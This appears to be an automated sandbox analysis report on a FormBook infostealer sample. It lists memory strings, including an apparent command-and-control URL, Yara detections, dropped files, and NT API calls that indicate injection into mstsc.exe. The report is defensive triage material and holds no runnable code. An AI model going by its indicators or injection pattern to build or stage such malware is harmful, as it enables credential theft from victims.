Source: mstsc.exe, 00000004.00000002.1549448935.00000000056A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars6.com
Source: mstsc.exe, 00000004.00000002.1549448935.00000000056A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.regulars6.com/aq3x/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: qkuriw.exe, type: SAMPLE
Source: Yara match | File source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\mstsc.exe | Dropped file: C:\Users\user\AppData\Roaming\K3-3TQ7V\K3-logri.ini
Source: C:\Windows\SysWOW64\mstsc.exe | Dropped file: C:\Users\user\AppData\Roaming\K3-3TQ7V\K3-logrv.ini
Malicious sample detected (through community Yara rule)
Source: qkuriw.exe, type: SAMPLE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: qkuriw.exe, type: SAMPLE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1325323347.0000000001221000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1542898983.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1543067846.0000000003291000.00000004.00000020.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.1277150451.0000000001221000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1325998412.0000000001560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1325803353.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1543143849.0000000003470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1543182112.00000000034A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.qkuriw.exe.1220000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\SysWOW64\mstsc.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_0123A190 NtAllocateVirtualMemory, 0_2_0123A190
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_0123A060 NtReadFile, 0_2_0123A060
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_0123A0E0 NtClose, 0_2_0123A0E0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01239FB0 NtCreateFile, 0_2_01239FB0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_0123A18A NtAllocateVirtualMemory, 0_2_0123A18A
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_0123A0DA NtClose, 0_2_0123A0DA
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01239FAA NtCreateFile, 0_2_01239FAA
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA99A0 NtCreateSection,LdrInitializeThunk, 0_2_01AA99A0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 0_2_01AA9910
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA98F0 NtReadVirtualMemory,LdrInitializeThunk, 0_2_01AA98F0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9860 NtQuerySystemInformation,LdrInitializeThunk, 0_2_01AA9860
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9840 NtDelayExecution,LdrInitializeThunk, 0_2_01AA9840
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9A20 NtResumeThread,LdrInitializeThunk, 0_2_01AA9A20
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9A00 NtProtectVirtualMemory,LdrInitializeThunk, 0_2_01AA9A00
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9A50 NtCreateFile,LdrInitializeThunk, 0_2_01AA9A50
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA95D0 NtClose,LdrInitializeThunk, 0_2_01AA95D0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9540 NtReadFile,LdrInitializeThunk, 0_2_01AA9540
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA97A0 NtUnmapViewOfSection,LdrInitializeThunk, 0_2_01AA97A0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9780 NtMapViewOfSection,LdrInitializeThunk, 0_2_01AA9780
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9710 NtQueryInformationToken,LdrInitializeThunk, 0_2_01AA9710
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_01AA96E0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 0_2_01AA9660
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA99D0 NtCreateProcessEx, 0_2_01AA99D0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9950 NtQueueApcThread, 0_2_01AA9950
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA98A0 NtWriteVirtualMemory, 0_2_01AA98A0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9820 NtEnumerateKey, 0_2_01AA9820
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AAB040 NtSuspendThread, 0_2_01AAB040
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AAA3B0 NtGetContextThread, 0_2_01AAA3B0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9B00 NtSetValueKey, 0_2_01AA9B00
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9A80 NtOpenDirectoryObject, 0_2_01AA9A80
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9A10 NtQuerySection, 0_2_01AA9A10
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA95F0 NtQueryInformationFile, 0_2_01AA95F0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9520 NtWaitForSingleObject, 0_2_01AA9520
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AAAD30 NtSetContextThread, 0_2_01AAAD30
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9560 NtWriteFile, 0_2_01AA9560
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9FE0 NtCreateMutant, 0_2_01AA9FE0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9730 NtQueryVirtualMemory, 0_2_01AA9730
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AAA710 NtOpenProcessToken, 0_2_01AAA710
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9760 NtOpenProcess, 0_2_01AA9760
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9770 NtSetInformationFile, 0_2_01AA9770
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AAA770 NtOpenThread, 0_2_01AAA770
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA96D0 NtCreateKey, 0_2_01AA96D0
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9610 NtEnumerateValueKey, 0_2_01AA9610
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9670 NtQueryInformationProcess, 0_2_01AA9670
Source: C:\Users\user\Desktop\qkuriw.exe | Code function: 0_2_01AA9650 NtQueryValueKey, 0_2_01AA9650
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069540 NtReadFile,LdrInitializeThunk, 4_2_05069540
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069560 NtWriteFile,LdrInitializeThunk, 4_2_05069560
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050695D0 NtClose,LdrInitializeThunk, 4_2_050695D0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069710 NtQueryInformationToken,LdrInitializeThunk, 4_2_05069710
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069770 NtSetInformationFile,LdrInitializeThunk, 4_2_05069770
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069780 NtMapViewOfSection,LdrInitializeThunk, 4_2_05069780
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069FE0 NtCreateMutant,LdrInitializeThunk, 4_2_05069FE0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069610 NtEnumerateValueKey,LdrInitializeThunk, 4_2_05069610
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069650 NtQueryValueKey,LdrInitializeThunk, 4_2_05069650
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_05069660
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050696D0 NtCreateKey,LdrInitializeThunk, 4_2_050696D0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050696E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_050696E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_05069910
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050699A0 NtCreateSection,LdrInitializeThunk, 4_2_050699A0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069840 NtDelayExecution,LdrInitializeThunk, 4_2_05069840
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_05069860
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069A50 NtCreateFile,LdrInitializeThunk, 4_2_05069A50
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069520 NtWaitForSingleObject, 4_2_05069520
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_0506AD30 NtSetContextThread, 4_2_0506AD30
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050695F0 NtQueryInformationFile, 4_2_050695F0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_0506A710 NtOpenProcessToken, 4_2_0506A710
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069730 NtQueryVirtualMemory, 4_2_05069730
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069760 NtOpenProcess, 4_2_05069760
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_0506A770 NtOpenThread, 4_2_0506A770
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050697A0 NtUnmapViewOfSection, 4_2_050697A0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069670 NtQueryInformationProcess, 4_2_05069670
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_05069950 NtQueueApcThread, 4_2_05069950
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_050699D0 NtCreateProcessEx, 4_2_050699D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069820 NtEnumerateKey,4_2_05069820
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506B040 NtSuspendThread,4_2_0506B040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050698A0 NtWriteVirtualMemory,4_2_050698A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050698F0 NtReadVirtualMemory,4_2_050698F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069B00 NtSetValueKey,4_2_05069B00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506A3B0 NtGetContextThread,4_2_0506A3B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A00 NtProtectVirtualMemory,4_2_05069A00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A10 NtQuerySection,4_2_05069A10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A20 NtResumeThread,4_2_05069A20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A80 NtOpenDirectoryObject,4_2_05069A80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A190 NtAllocateVirtualMemory,4_2_0306A190
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A060 NtReadFile,4_2_0306A060
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A0E0 NtClose,4_2_0306A0E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03069FB0 NtCreateFile,4_2_03069FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A18A NtAllocateVirtualMemory,4_2_0306A18A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A0DA NtClose,4_2_0306A0DA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03069FAA NtCreateFile,4_2_03069FAA
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123E1150_2_0123E115
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_012210300_2_01221030
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123D2030_2_0123D203
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DD3C0_2_0123DD3C
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222D870_2_01222D87
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222D900_2_01222D90
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DCB50_2_0123DCB5
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DFAC0_2_0123DFAC
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222FB00_2_01222FB0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DF860_2_0123DF86
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01229FC00_2_01229FC0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123D6190_2_0123D619
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A841200_2_01A84120
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A6F9000_2_01A6F900
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A920A00_2_01A920A0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B320A80_2_01B320A8
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7B0900_2_01A7B090
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B328EC0_2_01B328EC
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B210020_2_01B21002
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A9EBB00_2_01A9EBB0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B2DBD20_2_01B2DBD2
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32B280_2_01B32B28
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B322AE0_2_01B322AE
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A925810_2_01A92581
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7D5E00_2_01A7D5E0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B325DD0_2_01B325DD
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A60D200_2_01A60D20
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32D070_2_01B32D07
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B31D550_2_01B31D55
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7841F0_2_01A7841F
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B2D4660_2_01B2D466
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B31FF10_2_01B31FF1
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32EF70_2_01B32EF7
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A86E300_2_01A86E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2D074_2_050F2D07
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05020D204_2_05020D20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F1D554_2_050F1D55
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050525814_2_05052581
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F25DD4_2_050F25DD
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503D5E04_2_0503D5E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503841F4_2_0503841F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050ED4664_2_050ED466
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F1FF14_2_050F1FF1
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050ED6164_2_050ED616
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05046E304_2_05046E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2EF74_2_050F2EF7
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0502F9004_2_0502F900
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050441204_2_05044120
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050E10024_2_050E1002
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503B0904_2_0503B090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050520A04_2_050520A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F20A84_2_050F20A8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F28EC4_2_050F28EC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2B284_2_050F2B28
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0505EBB04_2_0505EBB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050EDBD24_2_050EDBD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F22AE4_2_050F22AE
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306D2034_2_0306D203
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052FB04_2_03052FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03059FC04_2_03059FC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306D6194_2_0306D619
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052D874_2_03052D87
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052D904_2_03052D90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0502B150 appears 35 times
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: String function: 01A6B150 appears 35 times
            Source: qkuriw.exeStatic PE information: No import functions for PE file found
            Source: qkuriw.exe, 00000000.00000002.1326816190.0000000001B5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qkuriw.exe
            Source: qkuriw.exe, 00000000.00000003.1323896342.0000000003C13000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs qkuriw.exe
            Source: qkuriw.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version =